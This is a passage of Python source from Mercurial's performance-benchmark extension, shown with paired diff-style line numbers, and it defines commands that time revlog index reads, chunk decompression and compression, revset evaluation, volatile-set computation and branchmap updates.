1111 textpairs.append((r.revision(dp), r.revision(rev)))
1121 textpairs.append((r.revision(dp), r.revision(rev)))
1112
1122
1113 def d():
1123 def d():
1114 for left, right in textpairs:
1124 for left, right in textpairs:
1115 # The date strings don't matter, so we pass empty strings.
1125 # The date strings don't matter, so we pass empty strings.
1116 headerlines, hunks = mdiff.unidiff(
1126 headerlines, hunks = mdiff.unidiff(
1117 left, '', right, '', 'left', 'right', binary=False)
1127 left, '', right, '', 'left', 'right', binary=False)
1118 # consume iterators in roughly the way patch.py does
1128 # consume iterators in roughly the way patch.py does
1119 b'\n'.join(headerlines)
1129 b'\n'.join(headerlines)
1120 b''.join(sum((list(hlines) for hrange, hlines in hunks), []))
1130 b''.join(sum((list(hlines) for hrange, hlines in hunks), []))
1121 timer, fm = gettimer(ui, opts)
1131 timer, fm = gettimer(ui, opts)
1122 timer(d)
1132 timer(d)
1123 fm.end()
1133 fm.end()
1124
1134
1125 @command('perfdiffwd', formatteropts)
1135 @command('perfdiffwd', formatteropts)
1126 def perfdiffwd(ui, repo, **opts):
1136 def perfdiffwd(ui, repo, **opts):
1127 """Profile diff of working directory changes"""
1137 """Profile diff of working directory changes"""
1128 timer, fm = gettimer(ui, opts)
1138 timer, fm = gettimer(ui, opts)
1129 options = {
1139 options = {
1130 'w': 'ignore_all_space',
1140 'w': 'ignore_all_space',
1131 'b': 'ignore_space_change',
1141 'b': 'ignore_space_change',
1132 'B': 'ignore_blank_lines',
1142 'B': 'ignore_blank_lines',
1133 }
1143 }
1134
1144
1135 for diffopt in ('', 'w', 'b', 'B', 'wB'):
1145 for diffopt in ('', 'w', 'b', 'B', 'wB'):
1136 opts = dict((options[c], '1') for c in diffopt)
1146 opts = dict((options[c], '1') for c in diffopt)
1137 def d():
1147 def d():
1138 ui.pushbuffer()
1148 ui.pushbuffer()
1139 commands.diff(ui, repo, **opts)
1149 commands.diff(ui, repo, **opts)
1140 ui.popbuffer()
1150 ui.popbuffer()
1141 title = 'diffopts: %s' % (diffopt and ('-' + diffopt) or 'none')
1151 title = 'diffopts: %s' % (diffopt and ('-' + diffopt) or 'none')
1142 timer(d, title)
1152 timer(d, title)
1143 fm.end()
1153 fm.end()
1144
1154
1145 @command('perfrevlogindex', revlogopts + formatteropts,
1155 @command('perfrevlogindex', revlogopts + formatteropts,
1146 '-c|-m|FILE')
1156 '-c|-m|FILE')
1147 def perfrevlogindex(ui, repo, file_=None, **opts):
1157 def perfrevlogindex(ui, repo, file_=None, **opts):
1148 """Benchmark operations against a revlog index.
1158 """Benchmark operations against a revlog index.
1149
1159
1150 This tests constructing a revlog instance, reading index data,
1160 This tests constructing a revlog instance, reading index data,
1151 parsing index data, and performing various operations related to
1161 parsing index data, and performing various operations related to
1152 index data.
1162 index data.
1153 """
1163 """
1154
1164
1155 rl = cmdutil.openrevlog(repo, 'perfrevlogindex', file_, opts)
1165 rl = cmdutil.openrevlog(repo, 'perfrevlogindex', file_, opts)
1156
1166
1157 opener = getattr(rl, 'opener') # trick linter
1167 opener = getattr(rl, 'opener') # trick linter
1158 indexfile = rl.indexfile
1168 indexfile = rl.indexfile
1159 data = opener.read(indexfile)
1169 data = opener.read(indexfile)
1160
1170
1161 header = struct.unpack('>I', data[0:4])[0]
1171 header = struct.unpack('>I', data[0:4])[0]
1162 version = header & 0xFFFF
1172 version = header & 0xFFFF
1163 if version == 1:
1173 if version == 1:
1164 revlogio = revlog.revlogio()
1174 revlogio = revlog.revlogio()
1165 inline = header & (1 << 16)
1175 inline = header & (1 << 16)
1166 else:
1176 else:
1167 raise error.Abort(('unsupported revlog version: %d') % version)
1177 raise error.Abort(('unsupported revlog version: %d') % version)
1168
1178
1169 rllen = len(rl)
1179 rllen = len(rl)
1170
1180
1171 node0 = rl.node(0)
1181 node0 = rl.node(0)
1172 node25 = rl.node(rllen // 4)
1182 node25 = rl.node(rllen // 4)
1173 node50 = rl.node(rllen // 2)
1183 node50 = rl.node(rllen // 2)
1174 node75 = rl.node(rllen // 4 * 3)
1184 node75 = rl.node(rllen // 4 * 3)
1175 node100 = rl.node(rllen - 1)
1185 node100 = rl.node(rllen - 1)
1176
1186
1177 allrevs = range(rllen)
1187 allrevs = range(rllen)
1178 allrevsrev = list(reversed(allrevs))
1188 allrevsrev = list(reversed(allrevs))
1179 allnodes = [rl.node(rev) for rev in range(rllen)]
1189 allnodes = [rl.node(rev) for rev in range(rllen)]
1180 allnodesrev = list(reversed(allnodes))
1190 allnodesrev = list(reversed(allnodes))
1181
1191
1182 def constructor():
1192 def constructor():
1183 revlog.revlog(opener, indexfile)
1193 revlog.revlog(opener, indexfile)
1184
1194
1185 def read():
1195 def read():
1186 with opener(indexfile) as fh:
1196 with opener(indexfile) as fh:
1187 fh.read()
1197 fh.read()
1188
1198
1189 def parseindex():
1199 def parseindex():
1190 revlogio.parseindex(data, inline)
1200 revlogio.parseindex(data, inline)
1191
1201
1192 def getentry(revornode):
1202 def getentry(revornode):
1193 index = revlogio.parseindex(data, inline)[0]
1203 index = revlogio.parseindex(data, inline)[0]
1194 index[revornode]
1204 index[revornode]
1195
1205
1196 def getentries(revs, count=1):
1206 def getentries(revs, count=1):
1197 index = revlogio.parseindex(data, inline)[0]
1207 index = revlogio.parseindex(data, inline)[0]
1198
1208
1199 for i in range(count):
1209 for i in range(count):
1200 for rev in revs:
1210 for rev in revs:
1201 index[rev]
1211 index[rev]
1202
1212
1203 def resolvenode(node):
1213 def resolvenode(node):
1204 nodemap = revlogio.parseindex(data, inline)[1]
1214 nodemap = revlogio.parseindex(data, inline)[1]
1205 # This only works for the C code.
1215 # This only works for the C code.
1206 if nodemap is None:
1216 if nodemap is None:
1207 return
1217 return
1208
1218
1209 try:
1219 try:
1210 nodemap[node]
1220 nodemap[node]
1211 except error.RevlogError:
1221 except error.RevlogError:
1212 pass
1222 pass
1213
1223
1214 def resolvenodes(nodes, count=1):
1224 def resolvenodes(nodes, count=1):
1215 nodemap = revlogio.parseindex(data, inline)[1]
1225 nodemap = revlogio.parseindex(data, inline)[1]
1216 if nodemap is None:
1226 if nodemap is None:
1217 return
1227 return
1218
1228
1219 for i in range(count):
1229 for i in range(count):
1220 for node in nodes:
1230 for node in nodes:
1221 try:
1231 try:
1222 nodemap[node]
1232 nodemap[node]
1223 except error.RevlogError:
1233 except error.RevlogError:
1224 pass
1234 pass
1225
1235
1226 benches = [
1236 benches = [
1227 (constructor, 'revlog constructor'),
1237 (constructor, 'revlog constructor'),
1228 (read, 'read'),
1238 (read, 'read'),
1229 (parseindex, 'create index object'),
1239 (parseindex, 'create index object'),
1230 (lambda: getentry(0), 'retrieve index entry for rev 0'),
1240 (lambda: getentry(0), 'retrieve index entry for rev 0'),
1231 (lambda: resolvenode('a' * 20), 'look up missing node'),
1241 (lambda: resolvenode('a' * 20), 'look up missing node'),
1232 (lambda: resolvenode(node0), 'look up node at rev 0'),
1242 (lambda: resolvenode(node0), 'look up node at rev 0'),
1233 (lambda: resolvenode(node25), 'look up node at 1/4 len'),
1243 (lambda: resolvenode(node25), 'look up node at 1/4 len'),
1234 (lambda: resolvenode(node50), 'look up node at 1/2 len'),
1244 (lambda: resolvenode(node50), 'look up node at 1/2 len'),
1235 (lambda: resolvenode(node75), 'look up node at 3/4 len'),
1245 (lambda: resolvenode(node75), 'look up node at 3/4 len'),
1236 (lambda: resolvenode(node100), 'look up node at tip'),
1246 (lambda: resolvenode(node100), 'look up node at tip'),
1237 # 2x variation is to measure caching impact.
1247 # 2x variation is to measure caching impact.
1238 (lambda: resolvenodes(allnodes),
1248 (lambda: resolvenodes(allnodes),
1239 'look up all nodes (forward)'),
1249 'look up all nodes (forward)'),
1240 (lambda: resolvenodes(allnodes, 2),
1250 (lambda: resolvenodes(allnodes, 2),
1241 'look up all nodes 2x (forward)'),
1251 'look up all nodes 2x (forward)'),
1242 (lambda: resolvenodes(allnodesrev),
1252 (lambda: resolvenodes(allnodesrev),
1243 'look up all nodes (reverse)'),
1253 'look up all nodes (reverse)'),
1244 (lambda: resolvenodes(allnodesrev, 2),
1254 (lambda: resolvenodes(allnodesrev, 2),
1245 'look up all nodes 2x (reverse)'),
1255 'look up all nodes 2x (reverse)'),
1246 (lambda: getentries(allrevs),
1256 (lambda: getentries(allrevs),
1247 'retrieve all index entries (forward)'),
1257 'retrieve all index entries (forward)'),
1248 (lambda: getentries(allrevs, 2),
1258 (lambda: getentries(allrevs, 2),
1249 'retrieve all index entries 2x (forward)'),
1259 'retrieve all index entries 2x (forward)'),
1250 (lambda: getentries(allrevsrev),
1260 (lambda: getentries(allrevsrev),
1251 'retrieve all index entries (reverse)'),
1261 'retrieve all index entries (reverse)'),
1252 (lambda: getentries(allrevsrev, 2),
1262 (lambda: getentries(allrevsrev, 2),
1253 'retrieve all index entries 2x (reverse)'),
1263 'retrieve all index entries 2x (reverse)'),
1254 ]
1264 ]
1255
1265
1256 for fn, title in benches:
1266 for fn, title in benches:
1257 timer, fm = gettimer(ui, opts)
1267 timer, fm = gettimer(ui, opts)
1258 timer(fn, title=title)
1268 timer(fn, title=title)
1259 fm.end()
1269 fm.end()
1260
1270
1261 @command('perfrevlogrevisions', revlogopts + formatteropts +
1271 @command('perfrevlogrevisions', revlogopts + formatteropts +
1262 [('d', 'dist', 100, 'distance between the revisions'),
1272 [('d', 'dist', 100, 'distance between the revisions'),
1263 ('s', 'startrev', 0, 'revision to start reading at'),
1273 ('s', 'startrev', 0, 'revision to start reading at'),
1264 ('', 'reverse', False, 'read in reverse')],
1274 ('', 'reverse', False, 'read in reverse')],
1265 '-c|-m|FILE')
1275 '-c|-m|FILE')
1266 def perfrevlogrevisions(ui, repo, file_=None, startrev=0, reverse=False,
1276 def perfrevlogrevisions(ui, repo, file_=None, startrev=0, reverse=False,
1267 **opts):
1277 **opts):
1268 """Benchmark reading a series of revisions from a revlog.
1278 """Benchmark reading a series of revisions from a revlog.
1269
1279
1270 By default, we read every ``-d/--dist`` revision from 0 to tip of
1280 By default, we read every ``-d/--dist`` revision from 0 to tip of
1271 the specified revlog.
1281 the specified revlog.
1272
1282
1273 The start revision can be defined via ``-s/--startrev``.
1283 The start revision can be defined via ``-s/--startrev``.
1274 """
1284 """
1275 rl = cmdutil.openrevlog(repo, 'perfrevlogrevisions', file_, opts)
1285 rl = cmdutil.openrevlog(repo, 'perfrevlogrevisions', file_, opts)
1276 rllen = getlen(ui)(rl)
1286 rllen = getlen(ui)(rl)
1277
1287
1278 def d():
1288 def d():
1279 rl.clearcaches()
1289 rl.clearcaches()
1280
1290
1281 beginrev = startrev
1291 beginrev = startrev
1282 endrev = rllen
1292 endrev = rllen
1283 dist = opts['dist']
1293 dist = opts['dist']
1284
1294
1285 if reverse:
1295 if reverse:
1286 beginrev, endrev = endrev, beginrev
1296 beginrev, endrev = endrev, beginrev
1287 dist = -1 * dist
1297 dist = -1 * dist
1288
1298
1289 for x in xrange(beginrev, endrev, dist):
1299 for x in xrange(beginrev, endrev, dist):
1290 # Old revisions don't support passing int.
1300 # Old revisions don't support passing int.
1291 n = rl.node(x)
1301 n = rl.node(x)
1292 rl.revision(n)
1302 rl.revision(n)
1293
1303
1294 timer, fm = gettimer(ui, opts)
1304 timer, fm = gettimer(ui, opts)
1295 timer(d)
1305 timer(d)
1296 fm.end()
1306 fm.end()
1297
1307
1298 @command('perfrevlogchunks', revlogopts + formatteropts +
1308 @command('perfrevlogchunks', revlogopts + formatteropts +
1299 [('e', 'engines', '', 'compression engines to use'),
1309 [('e', 'engines', '', 'compression engines to use'),
1300 ('s', 'startrev', 0, 'revision to start at')],
1310 ('s', 'startrev', 0, 'revision to start at')],
1301 '-c|-m|FILE')
1311 '-c|-m|FILE')
1302 def perfrevlogchunks(ui, repo, file_=None, engines=None, startrev=0, **opts):
1312 def perfrevlogchunks(ui, repo, file_=None, engines=None, startrev=0, **opts):
1303 """Benchmark operations on revlog chunks.
1313 """Benchmark operations on revlog chunks.
1304
1314
1305 Logically, each revlog is a collection of fulltext revisions. However,
1315 Logically, each revlog is a collection of fulltext revisions. However,
1306 stored within each revlog are "chunks" of possibly compressed data. This
1316 stored within each revlog are "chunks" of possibly compressed data. This
1307 data needs to be read and decompressed or compressed and written.
1317 data needs to be read and decompressed or compressed and written.
1308
1318
1309 This command measures the time it takes to read+decompress and recompress
1319 This command measures the time it takes to read+decompress and recompress
1310 chunks in a revlog. It effectively isolates I/O and compression performance.
1320 chunks in a revlog. It effectively isolates I/O and compression performance.
1311 For measurements of higher-level operations like resolving revisions,
1321 For measurements of higher-level operations like resolving revisions,
1312 see ``perfrevlogrevisions`` and ``perfrevlogrevision``.
1322 see ``perfrevlogrevisions`` and ``perfrevlogrevision``.
1313 """
1323 """
1314 rl = cmdutil.openrevlog(repo, 'perfrevlogchunks', file_, opts)
1324 rl = cmdutil.openrevlog(repo, 'perfrevlogchunks', file_, opts)
1315
1325
1316 # _chunkraw was renamed to _getsegmentforrevs.
1326 # _chunkraw was renamed to _getsegmentforrevs.
1317 try:
1327 try:
1318 segmentforrevs = rl._getsegmentforrevs
1328 segmentforrevs = rl._getsegmentforrevs
1319 except AttributeError:
1329 except AttributeError:
1320 segmentforrevs = rl._chunkraw
1330 segmentforrevs = rl._chunkraw
1321
1331
1322 # Verify engines argument.
1332 # Verify engines argument.
1323 if engines:
1333 if engines:
1324 engines = set(e.strip() for e in engines.split(','))
1334 engines = set(e.strip() for e in engines.split(','))
1325 for engine in engines:
1335 for engine in engines:
1326 try:
1336 try:
1327 util.compressionengines[engine]
1337 util.compressionengines[engine]
1328 except KeyError:
1338 except KeyError:
1329 raise error.Abort('unknown compression engine: %s' % engine)
1339 raise error.Abort('unknown compression engine: %s' % engine)
1330 else:
1340 else:
1331 engines = []
1341 engines = []
1332 for e in util.compengines:
1342 for e in util.compengines:
1333 engine = util.compengines[e]
1343 engine = util.compengines[e]
1334 try:
1344 try:
1335 if engine.available():
1345 if engine.available():
1336 engine.revlogcompressor().compress('dummy')
1346 engine.revlogcompressor().compress('dummy')
1337 engines.append(e)
1347 engines.append(e)
1338 except NotImplementedError:
1348 except NotImplementedError:
1339 pass
1349 pass
1340
1350
1341 revs = list(rl.revs(startrev, len(rl) - 1))
1351 revs = list(rl.revs(startrev, len(rl) - 1))
1342
1352
1343 def rlfh(rl):
1353 def rlfh(rl):
1344 if rl._inline:
1354 if rl._inline:
1345 return getsvfs(repo)(rl.indexfile)
1355 return getsvfs(repo)(rl.indexfile)
1346 else:
1356 else:
1347 return getsvfs(repo)(rl.datafile)
1357 return getsvfs(repo)(rl.datafile)
1348
1358
1349 def doread():
1359 def doread():
1350 rl.clearcaches()
1360 rl.clearcaches()
1351 for rev in revs:
1361 for rev in revs:
1352 segmentforrevs(rev, rev)
1362 segmentforrevs(rev, rev)
1353
1363
1354 def doreadcachedfh():
1364 def doreadcachedfh():
1355 rl.clearcaches()
1365 rl.clearcaches()
1356 fh = rlfh(rl)
1366 fh = rlfh(rl)
1357 for rev in revs:
1367 for rev in revs:
1358 segmentforrevs(rev, rev, df=fh)
1368 segmentforrevs(rev, rev, df=fh)
1359
1369
1360 def doreadbatch():
1370 def doreadbatch():
1361 rl.clearcaches()
1371 rl.clearcaches()
1362 segmentforrevs(revs[0], revs[-1])
1372 segmentforrevs(revs[0], revs[-1])
1363
1373
1364 def doreadbatchcachedfh():
1374 def doreadbatchcachedfh():
1365 rl.clearcaches()
1375 rl.clearcaches()
1366 fh = rlfh(rl)
1376 fh = rlfh(rl)
1367 segmentforrevs(revs[0], revs[-1], df=fh)
1377 segmentforrevs(revs[0], revs[-1], df=fh)
1368
1378
1369 def dochunk():
1379 def dochunk():
1370 rl.clearcaches()
1380 rl.clearcaches()
1371 fh = rlfh(rl)
1381 fh = rlfh(rl)
1372 for rev in revs:
1382 for rev in revs:
1373 rl._chunk(rev, df=fh)
1383 rl._chunk(rev, df=fh)
1374
1384
1375 chunks = [None]
1385 chunks = [None]
1376
1386
1377 def dochunkbatch():
1387 def dochunkbatch():
1378 rl.clearcaches()
1388 rl.clearcaches()
1379 fh = rlfh(rl)
1389 fh = rlfh(rl)
1380 # Save chunks as a side-effect.
1390 # Save chunks as a side-effect.
1381 chunks[0] = rl._chunks(revs, df=fh)
1391 chunks[0] = rl._chunks(revs, df=fh)
1382
1392
1383 def docompress(compressor):
1393 def docompress(compressor):
1384 rl.clearcaches()
1394 rl.clearcaches()
1385
1395
1386 try:
1396 try:
1387 # Swap in the requested compression engine.
1397 # Swap in the requested compression engine.
1388 oldcompressor = rl._compressor
1398 oldcompressor = rl._compressor
1389 rl._compressor = compressor
1399 rl._compressor = compressor
1390 for chunk in chunks[0]:
1400 for chunk in chunks[0]:
1391 rl.compress(chunk)
1401 rl.compress(chunk)
1392 finally:
1402 finally:
1393 rl._compressor = oldcompressor
1403 rl._compressor = oldcompressor
1394
1404
1395 benches = [
1405 benches = [
1396 (lambda: doread(), 'read'),
1406 (lambda: doread(), 'read'),
1397 (lambda: doreadcachedfh(), 'read w/ reused fd'),
1407 (lambda: doreadcachedfh(), 'read w/ reused fd'),
1398 (lambda: doreadbatch(), 'read batch'),
1408 (lambda: doreadbatch(), 'read batch'),
1399 (lambda: doreadbatchcachedfh(), 'read batch w/ reused fd'),
1409 (lambda: doreadbatchcachedfh(), 'read batch w/ reused fd'),
1400 (lambda: dochunk(), 'chunk'),
1410 (lambda: dochunk(), 'chunk'),
1401 (lambda: dochunkbatch(), 'chunk batch'),
1411 (lambda: dochunkbatch(), 'chunk batch'),
1402 ]
1412 ]
1403
1413
1404 for engine in sorted(engines):
1414 for engine in sorted(engines):
1405 compressor = util.compengines[engine].revlogcompressor()
1415 compressor = util.compengines[engine].revlogcompressor()
1406 benches.append((functools.partial(docompress, compressor),
1416 benches.append((functools.partial(docompress, compressor),
1407 'compress w/ %s' % engine))
1417 'compress w/ %s' % engine))
1408
1418
1409 for fn, title in benches:
1419 for fn, title in benches:
1410 timer, fm = gettimer(ui, opts)
1420 timer, fm = gettimer(ui, opts)
1411 timer(fn, title=title)
1421 timer(fn, title=title)
1412 fm.end()
1422 fm.end()
1413
1423
1414 @command('perfrevlogrevision', revlogopts + formatteropts +
1424 @command('perfrevlogrevision', revlogopts + formatteropts +
1415 [('', 'cache', False, 'use caches instead of clearing')],
1425 [('', 'cache', False, 'use caches instead of clearing')],
1416 '-c|-m|FILE REV')
1426 '-c|-m|FILE REV')
1417 def perfrevlogrevision(ui, repo, file_, rev=None, cache=None, **opts):
1427 def perfrevlogrevision(ui, repo, file_, rev=None, cache=None, **opts):
1418 """Benchmark obtaining a revlog revision.
1428 """Benchmark obtaining a revlog revision.
1419
1429
1420 Obtaining a revlog revision consists of roughly the following steps:
1430 Obtaining a revlog revision consists of roughly the following steps:
1421
1431
1422 1. Compute the delta chain
1432 1. Compute the delta chain
1423 2. Obtain the raw chunks for that delta chain
1433 2. Obtain the raw chunks for that delta chain
1424 3. Decompress each raw chunk
1434 3. Decompress each raw chunk
1425 4. Apply binary patches to obtain fulltext
1435 4. Apply binary patches to obtain fulltext
1426 5. Verify hash of fulltext
1436 5. Verify hash of fulltext
1427
1437
1428 This command measures the time spent in each of these phases.
1438 This command measures the time spent in each of these phases.
1429 """
1439 """
1430 if opts.get('changelog') or opts.get('manifest'):
1440 if opts.get('changelog') or opts.get('manifest'):
1431 file_, rev = None, file_
1441 file_, rev = None, file_
1432 elif rev is None:
1442 elif rev is None:
1433 raise error.CommandError('perfrevlogrevision', 'invalid arguments')
1443 raise error.CommandError('perfrevlogrevision', 'invalid arguments')
1434
1444
1435 r = cmdutil.openrevlog(repo, 'perfrevlogrevision', file_, opts)
1445 r = cmdutil.openrevlog(repo, 'perfrevlogrevision', file_, opts)
1436
1446
1437 # _chunkraw was renamed to _getsegmentforrevs.
1447 # _chunkraw was renamed to _getsegmentforrevs.
1438 try:
1448 try:
1439 segmentforrevs = r._getsegmentforrevs
1449 segmentforrevs = r._getsegmentforrevs
1440 except AttributeError:
1450 except AttributeError:
1441 segmentforrevs = r._chunkraw
1451 segmentforrevs = r._chunkraw
1442
1452
1443 node = r.lookup(rev)
1453 node = r.lookup(rev)
1444 rev = r.rev(node)
1454 rev = r.rev(node)
1445
1455
1446 def getrawchunks(data, chain):
1456 def getrawchunks(data, chain):
1447 start = r.start
1457 start = r.start
1448 length = r.length
1458 length = r.length
1449 inline = r._inline
1459 inline = r._inline
1450 iosize = r._io.size
1460 iosize = r._io.size
1451 buffer = util.buffer
1461 buffer = util.buffer
1452 offset = start(chain[0])
1462 offset = start(chain[0])
1453
1463
1454 chunks = []
1464 chunks = []
1455 ladd = chunks.append
1465 ladd = chunks.append
1456
1466
1457 for rev in chain:
1467 for rev in chain:
1458 chunkstart = start(rev)
1468 chunkstart = start(rev)
1459 if inline:
1469 if inline:
1460 chunkstart += (rev + 1) * iosize
1470 chunkstart += (rev + 1) * iosize
1461 chunklength = length(rev)
1471 chunklength = length(rev)
1462 ladd(buffer(data, chunkstart - offset, chunklength))
1472 ladd(buffer(data, chunkstart - offset, chunklength))
1463
1473
1464 return chunks
1474 return chunks
1465
1475
1466 def dodeltachain(rev):
1476 def dodeltachain(rev):
1467 if not cache:
1477 if not cache:
1468 r.clearcaches()
1478 r.clearcaches()
1469 r._deltachain(rev)
1479 r._deltachain(rev)
1470
1480
1471 def doread(chain):
1481 def doread(chain):
1472 if not cache:
1482 if not cache:
1473 r.clearcaches()
1483 r.clearcaches()
1474 segmentforrevs(chain[0], chain[-1])
1484 segmentforrevs(chain[0], chain[-1])
1475
1485
1476 def dorawchunks(data, chain):
1486 def dorawchunks(data, chain):
1477 if not cache:
1487 if not cache:
1478 r.clearcaches()
1488 r.clearcaches()
1479 getrawchunks(data, chain)
1489 getrawchunks(data, chain)
1480
1490
1481 def dodecompress(chunks):
1491 def dodecompress(chunks):
1482 decomp = r.decompress
1492 decomp = r.decompress
1483 for chunk in chunks:
1493 for chunk in chunks:
1484 decomp(chunk)
1494 decomp(chunk)
1485
1495
1486 def dopatch(text, bins):
1496 def dopatch(text, bins):
1487 if not cache:
1497 if not cache:
1488 r.clearcaches()
1498 r.clearcaches()
1489 mdiff.patches(text, bins)
1499 mdiff.patches(text, bins)
1490
1500
1491 def dohash(text):
1501 def dohash(text):
1492 if not cache:
1502 if not cache:
1493 r.clearcaches()
1503 r.clearcaches()
1494 r.checkhash(text, node, rev=rev)
1504 r.checkhash(text, node, rev=rev)
1495
1505
1496 def dorevision():
1506 def dorevision():
1497 if not cache:
1507 if not cache:
1498 r.clearcaches()
1508 r.clearcaches()
1499 r.revision(node)
1509 r.revision(node)
1500
1510
1501 chain = r._deltachain(rev)[0]
1511 chain = r._deltachain(rev)[0]
1502 data = segmentforrevs(chain[0], chain[-1])[1]
1512 data = segmentforrevs(chain[0], chain[-1])[1]
1503 rawchunks = getrawchunks(data, chain)
1513 rawchunks = getrawchunks(data, chain)
1504 bins = r._chunks(chain)
1514 bins = r._chunks(chain)
1505 text = str(bins[0])
1515 text = str(bins[0])
1506 bins = bins[1:]
1516 bins = bins[1:]
1507 text = mdiff.patches(text, bins)
1517 text = mdiff.patches(text, bins)
1508
1518
1509 benches = [
1519 benches = [
1510 (lambda: dorevision(), 'full'),
1520 (lambda: dorevision(), 'full'),
1511 (lambda: dodeltachain(rev), 'deltachain'),
1521 (lambda: dodeltachain(rev), 'deltachain'),
1512 (lambda: doread(chain), 'read'),
1522 (lambda: doread(chain), 'read'),
1513 (lambda: dorawchunks(data, chain), 'rawchunks'),
1523 (lambda: dorawchunks(data, chain), 'rawchunks'),
1514 (lambda: dodecompress(rawchunks), 'decompress'),
1524 (lambda: dodecompress(rawchunks), 'decompress'),
1515 (lambda: dopatch(text, bins), 'patch'),
1525 (lambda: dopatch(text, bins), 'patch'),
1516 (lambda: dohash(text), 'hash'),
1526 (lambda: dohash(text), 'hash'),
1517 ]
1527 ]
1518
1528
1519 for fn, title in benches:
1529 for fn, title in benches:
1520 timer, fm = gettimer(ui, opts)
1530 timer, fm = gettimer(ui, opts)
1521 timer(fn, title=title)
1531 timer(fn, title=title)
1522 fm.end()
1532 fm.end()
1523
1533
1524 @command('perfrevset',
1534 @command('perfrevset',
1525 [('C', 'clear', False, 'clear volatile cache between each call.'),
1535 [('C', 'clear', False, 'clear volatile cache between each call.'),
1526 ('', 'contexts', False, 'obtain changectx for each revision')]
1536 ('', 'contexts', False, 'obtain changectx for each revision')]
1527 + formatteropts, "REVSET")
1537 + formatteropts, "REVSET")
1528 def perfrevset(ui, repo, expr, clear=False, contexts=False, **opts):
1538 def perfrevset(ui, repo, expr, clear=False, contexts=False, **opts):
1529 """benchmark the execution time of a revset
1539 """benchmark the execution time of a revset
1530
1540
1531 Use the --clean option if need to evaluate the impact of build volatile
1541 Use the --clean option if need to evaluate the impact of build volatile
1532 revisions set cache on the revset execution. Volatile cache hold filtered
1542 revisions set cache on the revset execution. Volatile cache hold filtered
1533 and obsolete related cache."""
1543 and obsolete related cache."""
1534 timer, fm = gettimer(ui, opts)
1544 timer, fm = gettimer(ui, opts)
1535 def d():
1545 def d():
1536 if clear:
1546 if clear:
1537 repo.invalidatevolatilesets()
1547 repo.invalidatevolatilesets()
1538 if contexts:
1548 if contexts:
1539 for ctx in repo.set(expr): pass
1549 for ctx in repo.set(expr): pass
1540 else:
1550 else:
1541 for r in repo.revs(expr): pass
1551 for r in repo.revs(expr): pass
1542 timer(d)
1552 timer(d)
1543 fm.end()
1553 fm.end()
1544
1554
1545 @command('perfvolatilesets',
1555 @command('perfvolatilesets',
1546 [('', 'clear-obsstore', False, 'drop obsstore between each call.'),
1556 [('', 'clear-obsstore', False, 'drop obsstore between each call.'),
1547 ] + formatteropts)
1557 ] + formatteropts)
1548 def perfvolatilesets(ui, repo, *names, **opts):
1558 def perfvolatilesets(ui, repo, *names, **opts):
1549 """benchmark the computation of various volatile set
1559 """benchmark the computation of various volatile set
1550
1560
1551 Volatile set computes element related to filtering and obsolescence."""
1561 Volatile set computes element related to filtering and obsolescence."""
1552 timer, fm = gettimer(ui, opts)
1562 timer, fm = gettimer(ui, opts)
1553 repo = repo.unfiltered()
1563 repo = repo.unfiltered()
1554
1564
1555 def getobs(name):
1565 def getobs(name):
1556 def d():
1566 def d():
1557 repo.invalidatevolatilesets()
1567 repo.invalidatevolatilesets()
1558 if opts['clear_obsstore']:
1568 if opts['clear_obsstore']:
1559 clearfilecache(repo, 'obsstore')
1569 clearfilecache(repo, 'obsstore')
1560 obsolete.getrevs(repo, name)
1570 obsolete.getrevs(repo, name)
1561 return d
1571 return d
1562
1572
1563 allobs = sorted(obsolete.cachefuncs)
1573 allobs = sorted(obsolete.cachefuncs)
1564 if names:
1574 if names:
1565 allobs = [n for n in allobs if n in names]
1575 allobs = [n for n in allobs if n in names]
1566
1576
1567 for name in allobs:
1577 for name in allobs:
1568 timer(getobs(name), title=name)
1578 timer(getobs(name), title=name)
1569
1579
1570 def getfiltered(name):
1580 def getfiltered(name):
1571 def d():
1581 def d():
1572 repo.invalidatevolatilesets()
1582 repo.invalidatevolatilesets()
1573 if opts['clear_obsstore']:
1583 if opts['clear_obsstore']:
1574 clearfilecache(repo, 'obsstore')
1584 clearfilecache(repo, 'obsstore')
1575 repoview.filterrevs(repo, name)
1585 repoview.filterrevs(repo, name)
1576 return d
1586 return d
1577
1587
1578 allfilter = sorted(repoview.filtertable)
1588 allfilter = sorted(repoview.filtertable)
1579 if names:
1589 if names:
1580 allfilter = [n for n in allfilter if n in names]
1590 allfilter = [n for n in allfilter if n in names]
1581
1591
1582 for name in allfilter:
1592 for name in allfilter:
1583 timer(getfiltered(name), title=name)
1593 timer(getfiltered(name), title=name)
1584 fm.end()
1594 fm.end()
1585
1595
1586 @command('perfbranchmap',
1596 @command('perfbranchmap',
1587 [('f', 'full', False,
1597 [('f', 'full', False,
1588 'Includes build time of subset'),
1598 'Includes build time of subset'),
1589 ('', 'clear-revbranch', False,
1599 ('', 'clear-revbranch', False,
1590 'purge the revbranch cache between computation'),
1600 'purge the revbranch cache between computation'),
1591 ] + formatteropts)
1601 ] + formatteropts)
1592 def perfbranchmap(ui, repo, *filternames, **opts):
1602 def perfbranchmap(ui, repo, *filternames, **opts):
1593 """benchmark the update of a branchmap
1603 """benchmark the update of a branchmap
1594
1604
1595 This benchmarks the full repo.branchmap() call with read and write disabled
1605 This benchmarks the full repo.branchmap() call with read and write disabled
1596 """
1606 """
1597 full = opts.get("full", False)
1607 full = opts.get("full", False)
1598 clear_revbranch = opts.get("clear_revbranch", False)
1608 clear_revbranch = opts.get("clear_revbranch", False)
1599 timer, fm = gettimer(ui, opts)
1609 timer, fm = gettimer(ui, opts)
1600 def getbranchmap(filtername):
1610 def getbranchmap(filtername):
1601 """generate a benchmark function for the filtername"""
1611 """generate a benchmark function for the filtername"""
1602 if filtername is None:
1612 if filtername is None:
1603 view = repo
1613 view = repo
1604 else:
1614 else:
1605 view = repo.filtered(filtername)
1615 view = repo.filtered(filtername)
1606 def d():
1616 def d():
1607 if clear_revbranch:
1617 if clear_revbranch:
1608 repo.revbranchcache()._clear()
1618 repo.revbranchcache()._clear()
1609 if full:
1619 if full:
1610 view._branchcaches.clear()
1620 view._branchcaches.clear()
1611 else:
1621 else:
1612 view._branchcaches.pop(filtername, None)
1622 view._branchcaches.pop(filtername, None)
1613 view.branchmap()
1623 view.branchmap()
1614 return d
1624 return d
1615 # add filter in smaller subset to bigger subset
1625 # add filter in smaller subset to bigger subset
1616 possiblefilters = set(repoview.filtertable)
1626 possiblefilters = set(repoview.filtertable)
1617 if filternames:
1627 if filternames:
1618 possiblefilters &= set(filternames)
1628 possiblefilters &= set(filternames)
1619 subsettable = getbranchmapsubsettable()
1629 subsettable = getbranchmapsubsettable()
1620 allfilters = []
